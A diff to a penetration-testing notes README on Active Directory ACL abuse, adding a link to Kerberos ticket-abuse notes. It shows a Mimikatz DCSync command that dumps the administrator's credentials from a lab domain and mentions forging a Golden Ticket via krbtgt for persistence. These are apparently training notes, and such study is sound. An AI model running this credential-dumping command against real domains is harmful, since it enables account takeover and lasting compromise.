kiro6/penetration-testing-notes/Penetration Testing/ACLs-ACEs Abuse Attacks/README.md

 #### Windows
 - Using Mimikatz, we must target a specific user
-- We could also target the krbtgt account and use this to create a Golden Ticket for persistence
+- We could also target the krbtgt account and use this to create a Golden Ticket for persistence you can check here for more [ticket-abuse](https://github.com/kiro6/penetration-testing-notes/blob/main/Penetration%20Testing/Kerberos%20attacks/README.md#ticket-abuse)
 ```
 .\mimikatz.exe  "privilege::debug" "lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator"
 ```